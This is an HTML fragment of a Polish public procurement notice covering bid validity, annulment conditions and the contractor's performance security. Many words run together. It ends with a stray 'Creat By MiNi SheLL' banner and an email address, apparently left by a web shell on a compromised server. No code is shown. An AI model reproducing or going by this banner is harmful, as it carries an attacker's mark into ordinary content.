id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">ZAMAWIAJĄCY NIE DOPUSZCZA SKŁADANIA OFERT CZĘŚCIOWYCH IWARIANTOWYCH ZAMAWIAJĄCY NIE PRZEWIDUJE ROZLICZANIA W WALUTACHOBCYCH ZAMAWIAJĄCY NIE PRZEWIDUJE WYBORU NAJKORZYSTNIEJSZEJ OFERTY ZZASTOSOWANIEM AUKCJI ELEKTRONICZNEJ ZAMAWIAJĄCY NIE DOPUSZCZAMOŻLIWOŚCI SKŁADANIA OFERT W FORMIE KATALOGÓW ELEKTRONICZNYCHZAMAWIAJĄCY NIE PRZEWIDUJE ZWROTU KOSZTÓW UDZIAŁU W POSTĘPOWANIUZAMAWIAJĄCY NIE PRZEWIDUJE ZAWARCIA UMOWY RAMOWEJ ZAMAWIAJĄCY NIEPRZEWIDUJE DYNAMICZNEGO SYSTEMU ZAKUPÓW Przed zawarciem umowy w sprawiezamówienia publicznego, Wykonawca, którego oferta została uznana za najkorzystniejszązobowiązany jest dopełnić następujących formalności: 1) wnieść zabezpieczenie należytegowykonania umowy, 2) przedłożyć kopię umowy konsorcjum, jeżeli zamówienie będzie realizowaneprzez Wykonawców wspólnie ubiegających się o udzielenie zamówienia; 3) Przedłożyć do wgląduZamawiającemu dowody potwierdzające posiadanie stosownych uprawnień przez osoby wymienionew pkt. 6.1.2 c tiret 2 SIWZ. 4) Przedłożyć oświadczenie dotyczące zatrudnienia na postawie umów opracę zgodnie z pkt. 3.6. SIWZ. 5) Przedłożyć polisę lub inny dokument potwierdzający , żeWykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie związanym z przedmiotemzamówienia na kwotę nie mniejszą niż 800 000 zł. Wszelkie istotne dla stron postanowienia zawierająistotne postanowienia umowy stanowiące załącznik nr 3 do SIWZ. Umowa zostanie zawarta napodstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmian postanowieńzawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, wprzypadku wystąpienia co najmniej jednej z okoliczności w niej wymienionych z uwzględnieniempodanych w istotnych postanowieniach umowy warunków ich wprowadzenia. Zamawiający wymagawniesienia zabezpieczenia należytego wykonania umowy przez Wykonawcę, którego oferta zostałauznana za najkorzystniejszą. Zabezpieczenie należytego wykonania umowy wynosić będzie 10 % cenybrutto wynikającej ze złożonej oferty. Zabezpieczenie może być wnoszone według wyboruWykonawcy w jednej lub w kilku następujących formach: 1) pieniądzu; 2) poręczeniach bankowychlub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jestzawsze zobowiązaniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych;5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. Jeżeli zabezpieczeniebędzie wniesione w formie innej niż pieniężna, to z dokumentów stanowiących zabezpieczenie musijednoznacznie wynikać, że służy ono pokryciu wszelkich roszczeń z tytułu niewykonania lubnienależytego wykonania umowy, w tym ewentualnych kar umownych. Zabezpieczenie zostaniezwrócone Wykonawcy w ciągu 30 dni po wykonaniu Przedmiotu Umowy i uznaniu go za należyciewykonany. Wartość zabezpieczenia zostanie zwrócona wraz z odsetkami wynikającymi z umowyrachunku bankowego, pomniejszonymi o koszt prowadzenia tego rachunku oraz prowizji bankowej zaprzelew pieniędzy na rachunek bankowy Wykonawcy. Zabezpieczenie w formie pieniężnej należywnieść przelewem na rachunek bankowy Zamawiającego wskazany w pkt. 1 SIWZ. W przypadkuwniesienia wadium w formie pieniężnej Wykonawca może zwrócić się do Zamawiającego z pisemnymwnioskiem o zaliczenie wadium na poczet zabezpieczenia.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com